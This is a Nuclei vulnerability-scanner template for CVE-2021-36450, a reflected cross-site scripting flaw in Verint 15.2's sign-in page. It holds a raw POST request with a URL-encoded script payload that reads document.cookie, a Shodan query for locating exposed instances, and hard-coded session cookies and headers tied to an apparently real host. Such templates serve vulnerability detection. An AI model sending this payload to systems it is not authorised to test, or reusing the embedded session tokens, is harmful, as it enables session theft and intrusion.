-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2021-36450.yaml
51 lines (48 loc) · 2.31 KB
/
CVE-2021-36450.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
id: CVE-2021-36450
info:
name: Verint 15.2 XSS
author: atomiczsec
severity: medium
description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS)
reference:
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
metadata:
shodan-query: title:"Verint Sign-in"
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2021-36450
cwe-id: CWE-79
tags: cve,cve2021,xss
requests:
- raw:
- |-
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1
Host: {{Hostname}}
Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999
Content-Length: 155
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://verint11.five9-wfo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login
matchers-condition: and
matchers:
- type: word
part: body
words:
- class="loginUserNameText">TEST